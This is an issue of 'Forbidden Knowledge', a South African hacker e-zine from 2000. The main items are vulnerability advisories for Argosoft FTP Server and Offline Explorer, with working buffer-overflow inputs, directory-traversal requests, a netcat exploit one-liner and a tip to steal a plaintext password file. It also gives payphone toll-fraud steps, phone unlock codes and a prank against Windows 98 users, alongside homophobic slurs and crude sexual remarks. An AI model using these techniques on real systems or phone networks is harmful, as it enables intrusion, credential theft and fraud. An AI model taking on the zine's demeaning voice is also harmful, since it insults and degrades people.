_ ._ . $$$P##�ҷ, ^"'L, +,. $$P'^^ '?$, $$$; ?$, $? $$,y#$$$$QQy, $$$ ;$I $; $$$?' ^?$$; $$$ $$' $$; ;$$; $$$,$$$,_ .,q$?' $$I j$Z,_ $$$$$$$P$$$$$P' $$$ .+�"^'"~ j$$$`$$$'^'?$$, ,_ $$$ J$$$' $$$ $$$ ^Q##$$$��qqqq ,d$$$' $$$ $$$; `?$$$"" ,q$$$P` ;$$$ ;$$Z . $$$ .;$$$$"^ ,$$$$ '?$P, . : $$$ Z$$$$$$QQ###Z?' "�,._ : ',$,,' ``^^^""""��i, ',,$,' . $" , + , "$ . ; $ ; . ; $ ; . ^;. $ . EFF TW0 KAY!@#%& . $ .;^ .'$; "$$" ITZ THE IN THING TO SAY "$$" ;$';$^ ,$$,.,;' WE ARE SO DAMN GHAY ';,.,$$, ^$;$$$$"^`` BUT WH0T THE HEY ``^" $$$$"' '" Issue Nine: Released Valentines Day, 2000AD Forbidden Knowledge: Telkom's best friend since 1998 Hold it right there! Do you have some-one special in your life that you should be giving your utmost adoration to at this moment instead of reading this? Good. Neither do we. :) Editors: Wyzewun, Pneuma, Vortexia Writers: Moe1, Jus Azzkjey: Cyberphreak The el8 Contributers to this Ish: MercEnarY, CoLdBLood, egodeath Shout Outz +-======-+ Blabber.Net's #hack, b4b0, DrSmoke, MostHated, kokey, icesk, The Chiqz in the hostal across from us who do strip shows for me and Pneuma, UglyKidJoe, aus, Cruciphux, NtWaK0, Opium, Corrupt SYN, Sigma, ColdBlood, Everyone involved with RIFT, b10z, Ultima, Eth`Real, MercEnarY, Gevil, meiso, egodeath Fuck Youz +-=====-+ Telkom, Oprah Windfrey, The US Government, The SA Government, Chiqz from Catholic All-Girls schools who wave at me and giggle, The Prostitues on my road who wave at me and lift their shirts, Anyone without any cheap plastic toys on their monitor, Anyone who is a member of a LUG, Stalker and all those other #hack elitez who suck dick for Chanserv, Heroin addicts without scottish accents Gov-Boi's Valentine: www.r33t.org/images/mmm.jpg South African demo scene disk mag: RIFT Toys of the Month: ngrep , FreeAmp , GPG , nmap Official FK9 Demi-God: Gillian Anderson Official FK9 Beverage: Dark Dog Official FK9 Games: Commander Keen, Zork, and all things l33t and retr0 Official FK9 Soundtrack: Korn - Issues, Limp Bizkit - Significant Other, Bloodhound Gang - Hooray for Boobies Yes: I finally gave in. Pneuma made me watch 'Hackers' - the movie. I have never seen anything more hilarious in my life. Man, I want to get that on video, heh. :P Us Being Media Wh0rez: ftp.electrocity.com/pub/videos/carte_blanche.mpg ' Maybe you've noticed the new interface, reason being, Wyzewun is a total crackdolphin when it comes to designing something. Hope it looks better than the shitty FK logo's i draw :) ' ---- cyberphreak ' This issue sucks, but the next one will 0wn ' ---- New official motto for every issue we release. Ever. :P ________,,,........... .........______ $$$$$$$$$�������^^^^^ '''''"""???zz. $$ ^?$$$ `?; $$ '$$ Contents of Forbidden Knowledge Issue 9 $;$$$ ?; ,,?;I$$$ ,"________________________________________________________..,,##���', $$ _.+ +.,; 0x90> Intro 0x90> Byteware of the Month Articlez... 0x61> VMB's Carriers, etc etc 0x62> Book Review - Maximum Security 0x64> Argosoft FTP Server Advisory 0x65> Accepting the New Generation 0x63> Oh no, not More IRC Logs 0x64> Cellphone and Payphone Warez 0x65> Offline Explorer Advisory 0x66> The Drunk Article Other junk... 0x30> Secret Zero-day C++ Kodez (3L33T.cPp) 0x31> Secret Oh-day Phone Warez (3L33T.mP3) 0x32> More Fun with spoofing (mommysmurf.c) 0x33> Egodeath's Ghay RDS Kodez (rfind.zip) 0x34> Telkom Ghay Seckz Juarez (telkom.txt) 0x35> TCP/UDP Portscanner (portskanah2.zip) 0x36> IIS4 Long *.HTR Vulnerability Scanner 0x90> Lamer of the Millenium 0x90> Outro ,?' $$; $$$QQQ####,,,,________________________________ _________ ______ _ ^^^^^^^^^"""""" __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Editorial by Wyzewun ._ ,;:;,, _. Supplies Low. Starving to Death. Send Help immediately. Yeh, I'm in boarding school - Can you handle it? ;) Heh, actually I just really needed to get away from my fantastically pathetic and completely emotionally inept parents and boarding school was the quickest escape route at hand. *Sigh* It works well enough, so what the hell. And besides, living here is dope - a ley line runs directly through the hostal. (Those of you with a vague knowledge of the occult will know what I am talking about - the rest of you - get a clue bizatch! :P) At the end of this year I'll probably be sharing a place with Moe1 and/or Pneuma, so that should be quite cool. Once again, I don't want to have to live with my parents for longer than a month inbetween finishing school and then - the weekends I spend with them are bad enough. I get depressed being away from people with talent and emotions and from being away from the ley line, where I'm just naturally more at home. Anyway, everything is going to take a complete turn-around next year when I begin my new life as a suit - PHEAR! :) Mmm, I'm not sure exactly how becoming an upstanding citizen will affect FK, but hopefully, the impact upon it will be minimal. I just wouldn't *like* being a jargon-spewing egocentric suit with a surgically removed personality, and although I will make a very concerned effort to appear as mentally stable as possible to potential clients, I don't want personal things like FK to have to change. It's my baby, and I like it the way it is, damnit. :P Anyway, enjoy this issue - Regardless of what the future holds for us, this issue is still bad as ever. Good ol' reliable FK... ;D Cheers, Drew/Wyzewun ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Byteware for this Issue ._ ,;:;,, _. Byteware from Wyzewun... ------------------------ Vodacom SMS billing lags significantly behind normal billing. Say no more. --- Editing FreeAmp's /base/win32/src/win32thread.cpp file can make it run decently under Win9x/Nt, something it doesn't do by default. :/ Just change the following... m_priority = Normal; To, something like... oh, this... :) m_priority = Critical; It still screws up a bit if you start working in a DOS prompt though. I can't figure out why, else I would fix this too. :/ --- 220 1100JD1100 Service ready for new user. Anyone know what kind of system that is? Mail me! :) --- Oh yeh, Sigma pointed out to me that that bug in TP7's Crt library only affects Celeron processors. Right. Case closed. We understand the problem fully... Errr... Two issues after the problem occured, HEH. ;-) --- Right. Time for a gay little trick to play on Windoze 98 Users. Find an old copy of Pacman that can't be exitted in any way other than rebooting the whole PC. Make a PIF file for it so that it will always run in MS-DOS mode. Then run it, and watch Pacman boot instead of Win98 again and again and again. :) ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Book Review by Wyzewun: "Maximum Security" by Anonymous ._ ,;:;,, _. Maximum Security: A Hacker's Guide to Protecting your Internet Site & Network By Anonymous ISBN: 1-57521-268-4 Downloadable from: blacksun.box.sk I chose to review this book because it is one of the most popular amongst businessmen who want a quick and dirty insight into security. The "Hacker's Guide" thing seems to make them sell like hotcakes. And the suits that read this book are impressed, as one would imagine, because it makes security look straight foward and easy, and once they've read it, they feel that they understand. Great, but how about understanding how it *really* is? :) I have to be honest - The book looks like the product of about a month online sifting through the results of a search for "hack" on Altavista. Several explanations are left out, simply because the author doesn't fully understand the idea himself, and it is just left not making sense. ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. "Oh no! Not more IRC Logs!" collected by Wyzewun ._ ,;:;,, _. wyze1: WHY AM I NEVER IN FK LOGS! opium: COZ YER NOT AMUSING, SLUT! dont tell me that :( � opium will give wyze1 anal sex!!! gov-boi_: have you exploit sucefully the ssh 1.3.27 ? CodeZer0: yea. Ok so I'm drinking champagne 3-2-1 HAPPY NEW YEAR And so I sit. Look around And NOTHING happened. I was disapointed. The aliens could of at least come and say hi. Well with all the fuss i just wanted something to happen. No riots, aliens.. whirlygig: yeh, i want my money back Money from what? ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Argosoft FTP Server Advisory by Moe1 ._ ,;:;,, _. The Argosoft FTP Server [www.argosoft.com] contains multiple vulnerabilities in various FTP commands which allow execution of arbitary code and the ability to read any file on the hard-drive. Any command followed by 2050 characters causes the FTP Server to crash. example: C:\>ftp Connected to 220 Argosoft FTP Server, Version 1.0 ( User ( characters long) After a while the FTP Server logs show... ( 4) 'Error: Access violation at address 00401CBB in module 'FTPSERVER.EXE'. Write of address 41414145 [Wyzewun's Babblings: Classic Buffer Overflow] When FTP Server is shutdown, another error occurs... FTPSERVER caused an invalid page fault in module at 0000:00000000. Registers: EAX=00000000 CS=0000 EIP=00000000 EFLGS=00000000 EBX=00000000 SS=0000 ESP=00000000 EBP=00000000 ECX=00000000 DS=0000 ESI=00000000 FS=0000 EDX=00000000 ES=0000 EDI=00000000 GS=0000 [Wyzewun's Babblings: This is a BSS Overflow (Uninitialized Heap Data). Or at least I think it is - some-one bitch at me if I'm wrong. Anyway, The BSS is executable in most OS's, for pretty much no reason at all (Like we're going to need to execute a whole bunch of zeros), and Windoze is no exception. In fact, I think the only exception is Solaris - I can't say I'm sure about that though. Anyway, having an executable BSS creates a pointless security threat, and OS developers really should stop making it as such.] C:\work\Argosoftftp>ftp Connected to 220 Argosoft FTP Server, Version 1.0 ( User ( t-zr 331 User name OK, need password Password: 230 User t-zr logged in successfully ftp> quote cwd AAAAAAA...(2050 characters long) FTP Server crashes with... FTPSERVER caused an invalid page fault in module FTPSERVER.EXE at 015f:00405b71. Registers: EAX=0040788c CS=015f EIP=00405b71 EFLGS=00010287 EBX=0040788c SS=0167 ESP=00e1fc3c EBP=00e201cc ECX=00000001 DS=0167 ESI=00e201c8 FS=0f5f EDX=00e201c8 ES=0167 EDI=00407ad8 GS=0000 If logging is enabled then before the Server crashes the logs show... ( 1) 'Error: Invalid pointer operation [Wyzewun's Babblings: Heap overflow. This also works even without the 'CWD' or whatever in front of it - the bug is in the code that recieves the command from the socket, not in the code that executes it. I don't know exactly how the author has written this program for this problem to occur, so I think I'll leave it at "badly". :P] Argosoft FTP Server allows directory climbing out of homedirectory in the same manner Wyzewun covered with E-Serv last issue. Just 'quote cwd ../' and you're on your way. ;-) Argosoft FTP Server keeps passwords in plain text in the users.dat file, so get that if you want. This has been tested under Win95, Win98 and WinNT. Bottom line: Argosoft FTP Server offers NO security. And now, for humours sake, the authors reaction to me showing him this... ------------------ snip snip ----------------------- Thanks for your list. It is really very handy and useful. But, you will have to keep in mind, that what I am offering is a freeware program, and you should not be demanding from it too much security, and handling of such a difficult issues such large strings and so on. [Moe1: hmm... too much security??? wtf is the bitch talkin about?? there aint NO security in this ftp server!] [Wyze1: Damn straight, and just coz yer program is free, doesn't mean it has to be AWFUL. Also, handling large strings is difficult??? How difficult is the Delphi equivalent of a 'for' loop and a routine to get a single character? I'm only 16, my code *sucks*, and *I* don't find this difficult. And the thing that really scares me here is that all this is coming from a programmer by profession. Heeey, that's an idea! Nevermind my final year of school, I'm going to go and work for Argosoft!!@#$% :P] Anyway, I will keep in mind all your comments and suggestions, and definitely will do improvements. Happy New Year!!! Artchil Gogava ------------------ snip snip ----------------------- HEH, Delphi coders are so gay. (With apologies to Sigma of corz - we lub j0o) ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Various Phone Warez from MercEnarY ._ ,;:;,, _. First off, let's cover phreaking the telkom tetabox fones. Note: Not the big blues ones, those small ones you find in some places [Wyzewun: He's reffering to Telkom's Chatterbox range. You'll recognize it coz it says "Chatterbox" on it - imagine that :P] This technique was picked up by me when trying to phone ppl in Johannesburg when i was at boarding school, and lets you use telkom coin phone to phone for free (not exactly free cause the line still gets charged just not you)... 1) You need access to the plugin point of the phone (some of the older phones have a point where the jack can be attached to the phone, in the newer ones the jack is already attached, therefore you need to find then point where the jack goes into the wall instead) 2) Now dial '080' and wait for the fast engaged signal 3) When you have the signal quickly take the jack out of the connection point and put it back in, check if the phone has dialing tone and 080 is still printed on the LCD screen, if there is no dialing tone you have moved the line in and out too fast, if the 080 is not printed on the screen you have moved the line too slow 4) Now the phone has 080 on the screen and then you can dial the number you want. Also note that if you want to dial a local number you must enter the area code. Theory behind this: The phone is lead to believe that you are dialing a 080 (toll free) number. Wondering: If you cut a fone line coming out a normal payphone and connect it to so that you have a point where you can connect and disconnect as you please, would this work? [Wyzewun: Yes] --- Now for How to get mastercode for unlocking cellphones... The code is a combination of the SP code (5 digit) and phone IMEI (15 digit) use mc1.exe and mc2.exe to get the code To view the IMEI of the Cell, press: *#06# Check,Activate or Remove card restrictions #pw+XXXXXXXXXX+1# - Provider-Lock status #pw+XXXXXXXXXX+2# - Network-Lock status #pw+XXXXXXXXXX+3# - Provider(???)-Lock status #pw+XXXXXXXXXX+4# - SimCard-Lock status XXXXXXXXXX (master code) is a 10 digit code, based on the IMEI number of your phone. Press * many times for "p" and "w". Service Provider Codes MTN = 655 10 Vodacom = 655 01 --- Now let's play around a bit with Net monitor on your cellphones (works wif Nokia 51xx and 61xx maybe 3210) Net Monitor is an extended menu on Nokia Phone. This will be a new additional Menu on your Nokia 5110 if you installing this option. For enabling the Net Monitor with a FBUS cable you need the DOS software PCLocals V1.3. The Network Monitor gives you the following information: Carrier number MS RX level in dBM Received signal quality MS TX power level C1 (path loss criterion, used for cell selection and reselection). The range is -99 to 99 RLT (Radio Link timeout) Timeslot Indication of the transmitter status Information on the network parameters TMSI (temporary Mobile Subscriber Identity) Cell Identification (CELL ID, number of the cell being used) MCC (Mobile Country Code) MNC (Mobile Network Code) LAC (location Area Code) Ciphering (on/off) Hopping (on/off) DTX (on/off) Discarding cell barred information Here is a 10 step description for enabling the net monitor (field test display) using PCLocals: Make sure to start PCLocals in plain DOS First don't connect the phone, start the program and ignore the error message. Configure the cable type and com port (hardware com port, not the virtual com port like for the datasuite). Save the settings, quit the program. Connect the phone with the cable and start the program. The phone "boots" as you enter the main menu and all options become available (all menus are white colored). Choose menu 3 (ME Memory Functions). Choose menu 6 (Field Test Display Settings). Now you have the following options: Enter 243 to activate the "big" net monitor (menu 01 to 89 including menus 01 to 19). Enter 242 to activate the "small" net monitor (menu 01 to 19). Enter 241 to deactivate the net monitor. Enter 240 to reset timers (?) Don't forget to confirm your selection with hitting enter (you won't see any reaction but it's necessary) Quit the program, the phone "boots" and enjoy the net monitor All following actions are done with the phone. Go to the menu net monitor and at the test prompt enter 241 to deactivate the net monitor completely. Furtherly you can change from the big net monitor to the small net monitor by entering 242 at the test prompt (if menu net monitor is still available); Note: after that you can't change to the big net monitor again!! Note: if u cant find pclocals use net_monitor.exe, i dunno if it gets the big or small menu All comments should be mailed to MercEnarY at mercenary@sylicon.org ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Offline Explorer Advisory by Wyzewun ._ ,;:;,, _. Offline Explorer as available from www.metaproducts.com is the most popular Offline Web Browser available. It's fast, flexible, easy to use, and it does its job well. It is also a *HUGE* security hazard. Offline Explorer starts a server on port 800, through which one can view the downloaded webpage(s). So the poor shmuck's cache becomes remotely accessible! This is a security threat in itself, but it gets even worse: Remote directory climbing is possible! Right. Let's try some stuff out... GET /../ HTTP/1.1 HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 57

404 Document Not Found

Nope. Let's try this then... GET ../ HTTP/1.1 HTTP/1.0 200 OK Server: Web Downloader 4.1 (Win32) Content-Type: text/html Content-Length: 464 ../

Directory of ../

0 ..

Offline Explorer 1.1 (C) 1998 - 1999, MetaProducts corp. Righty! So We're on to something! Well... unfortunately, not. We can't do anything along the lines of 'GET ../../' and something like 'GET ......../' won't work either. So practically, this means very little. :( What we *can* tell, however, is that the vulnerability *is* there. We just need to figure out how to exploit it. And so, we employ Wizdumb's el8 directory climbing with a twist. Like so... GET ../..\ HTTP/1.1 HTTP/1.0 200 OK Server: Web Downloader 4.1 (Win32) Content-Type: text/html Content-Length: 5048 ../..\

Directory of ../..\

0My Documents
stupid.c << unf void main() { printf("GET ../..\\\ HTTP/1.1\n\n"); } unf [drew@kung-fusion]$ gcc stupid.c -o stupid [drew@kung-fusion]$ ./stupid | nc lame.doze.box 800 > heh.html [drew@kung-fusion]$ lynx heh.html Right. That's all from me for now. HEH, /../ this ../..\ that, I should become a full time ../ hax0rer! :P Cheers... ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. The Drunk Article by Wyzewun and Pneuma ._ ,;:;,, _. [Note from the Editor: Don't ask me, I woke up one morning and it was here. Forgein readers with no el8 Afrikaans sk1llz will have to suffer. :)] JESUS LIOVES ME VIZ I KNOW COZ DA BIBLE TELLZ ME SO MUAHAKLLALALAKLALALALA ONS EET BOEREWORS ONS IS DRONK FK EDITROS OF SOM KAK PHEAR ONS ONS IS NIE SOBER ONS HET GEPHUZA ONS IS UBER LEET ONS HAX000000000000000000000000000000000R GEGIBSONS EN POES WANT ONS IS DRONK KOM MY MIKIES, KOM LAAT DRINK DIS DIE BESTE IN DIE WERELD KOM MY LIEVE DRONKING KEREL LAAT ONS GEVOK WEES SOOS DIE BEES FINALLY THE ONE LEGGED MAN MAKES HIS APPEARANCE AAAAAAAAAAAAAAAAARRRRRRRRRRGH I HAVCE KOS KOS IN MYN POES DO U HAVE KOS KOS IN YOUR POES? WE *ALL* SHIOULD HAVE KOS KMOS IN OWER POESA!!!! HIERDIE IS DIE BESTE DRONKSTE FK ARTIOKLE IN VA HISTORY VAN FK ONS IS VOKKING ELEET ONS HAX0R GIBZONS ELKE DAG HAX0R JY GIVZ0NS ELKE DAG JY VOKKING LAMH0RZ, 0NS 09WN JULLE 0NS IS ELIYEZ SOOS GOV-B0I WAT SPTUPID 0-D4Y TRADEZ0R 0NDS IS DIE BESTE HAX0RZ IN SUID AFRIKA 0NS HET DIE 0-DDAY 0BNS HET DIE BIER 0NS HET DIE CHEAP WINE 0NS HET DIE MAD AFRIKAANS SPEAKING SKILZZ PHEAR 0NZ - K00S 0WNZ J00 ALL@!&^#@#$^(^@(&(& ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; ________,,,........... .........______ $$$$$$$$$�������^^^^^ '''''"""???zz. $$ ^?$$$ `?; $$ '$$ Gaan weg van my jy Slapgat!@#$%^& $;$$$ ?; ,,?;I$$$ ,"________________________________________________________..,,##���', $$ _.+ +.,; " But would I be a good Messiah with my low self esteem, If I don't believe in myself would that be blasphemy? Just sport some crummy 'holier than thou' facade, Yeah that's what I would do if I were God " --- Bloodhound Gang, Hell Yeah da f0ll0w1ng s00per-fux1ng el8 sytez c0urier the 0-d4y ju4r3z to j0o... http://packetstorm.securify.com/mag/fk http://www.security.za.net/wyze1/fk.html http://hackersclub.com/km/magazines/fk.html ftp://ftp.etext.org/pub/Zines/Forbidden_Knowledge http://www.attrition.org/~modify/texts/zines/Forbidden_Knowledge Thanks to kM, modify, the Packetstorm Staff and E-Text for being our official distribution sites. mailto:wyze1@sexdrugsunix.org http://www.security.za.net/wyze1